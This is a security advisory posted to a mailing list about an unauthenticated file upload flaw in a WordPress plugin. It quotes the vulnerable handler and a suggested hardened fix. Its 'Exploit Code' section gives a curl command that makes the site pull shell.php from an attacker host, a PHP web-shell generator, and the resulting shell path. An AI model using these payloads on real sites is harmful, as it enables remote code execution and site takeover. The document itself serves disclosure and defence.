Message-id: <968B1E14-0721-4973-8564-EEA02685D040@me.com>
Date: Sun, 30 Apr 2017 12:45:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7

Title: Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7
Author: Larry W. Cashdollar, @_larry0
Date: 2017-04-26
CVE-ID: [CVE-2017-1002016]
Download Site: https://wordpress.org/plugins/flickr-picture-backup/
Vendor: http://daozhao.goflytoday.com/
Vendor Notified: 2017-04-26
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=190

Description: Backup flickr's pictures which are in page/post external links to flickr's pictures.

Vulnerability: The code in flickr-picture-download.php doesn't check to see if the user is authenticated or that they have permission to upload files. It also doesn't check what type of file is being uploaded.

    define('WP_ADMIN', TRUE);
    require_once('../../../wp-load.php');
    require_once(ABSPATH . 'wp-admin/includes/admin.php');
    //require_once("./flickr-picture-backup.php");
    //echo "flickr-picture-download.php";

    if($_GET["url"]) {
        // No is_user_logged_in() / current_user_can() check: any unauthenticated visitor reaches this.
        $url = $_GET["url"];
        // The remote file is fetched and stored as-is; nothing restricts its type or origin host.
        $fl = wp_daozhao_download_flickr_picture($url);
        if ( is_wp_error($fl) ) {
            echo "FALSE:" . $fl->get_error_message();
        } else {
            wp_daozhao_flickr_backupfile_exists($url,$returl);
            echo "OK:" . $returl ;
        }
        //echo wp_daozhao_flickr_backup_urlpath();
        //echo "OK";
    }

Exploit Code:

    $ curl http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php -d "url=http://myhost/shell.php"

Where shell.php is code to print out php web shell code, something like:

    <?php
    echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n";
    ?>

Upon exploitation your shell is in:

    http://example.com/wp-content/uploads/flickr_backup/shell.php
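As an added example (not the plugin's own code and not the vendor's fix), a hardened version of the handler above that adds the missing authentication, capability, nonce, host and file-type checks before calling the plugin's download functions; the nonce action name 'flickr_backup_download' and the flickr host allowlist are assumptions.

```php
<?php
// Hardened replacement for flickr-picture-download.php (added example, not the
// plugin's own fix). Assumes the plugin's wp_daozhao_download_flickr_picture()
// and wp_daozhao_flickr_backupfile_exists() are unchanged; the nonce action
// name and the host allowlist below are assumptions.
define('WP_ADMIN', TRUE);
require_once('../../../wp-load.php');
require_once(ABSPATH . 'wp-admin/includes/admin.php');

// 1. Authentication + authorisation: only users who may upload files at all.
if ( ! is_user_logged_in() || ! current_user_can( 'upload_files' ) ) {
    wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
}

// 2. CSRF protection: the calling page must pass a nonce for this action.
check_admin_referer( 'flickr_backup_download' );

// 3. Take the URL from the request only after unslashing and sanitising it.
$url = isset( $_GET['url'] ) ? esc_url_raw( wp_unslash( $_GET['url'] ) ) : '';
if ( '' === $url || ! wp_http_validate_url( $url ) ) {
    wp_die( 'Bad URL', 'Bad Request', array( 'response' => 400 ) );
}

// 4. Only fetch from the hosts this plugin exists to back up (assumed list).
$allowed_hosts = array( 'staticflickr.com', 'flickr.com' );
$host    = strtolower( (string) wp_parse_url( $url, PHP_URL_HOST ) );
$host_ok = false;
foreach ( $allowed_hosts as $allowed ) {
    $suffix = '.' . $allowed;
    if ( $host === $allowed || substr( $host, -strlen( $suffix ) ) === $suffix ) {
        $host_ok = true;
    }
}

// 5. Only image types the site already permits for uploads: wp_check_filetype()
//    returns type => false for anything outside the allowed list (e.g. .php).
$path     = (string) wp_parse_url( $url, PHP_URL_PATH );
$filetype = wp_check_filetype( basename( $path ) );
$type_ok  = ! empty( $filetype['type'] ) && 0 === strpos( $filetype['type'], 'image/' );

if ( ! $host_ok || ! $type_ok ) {
    wp_die( 'Only flickr image URLs can be backed up', 'Bad Request', array( 'response' => 400 ) );
}

$fl = wp_daozhao_download_flickr_picture( $url );
if ( is_wp_error( $fl ) ) {
    echo 'FALSE:' . esc_html( $fl->get_error_message() );
} else {
    wp_daozhao_flickr_backupfile_exists( $url, $returl );
    echo 'OK:' . esc_url( $returl );
}
```

The extension check only inspects the URL's path, so a complete fix should also verify the downloaded bytes (for example with getimagesize()) before leaving them under wp-content/uploads.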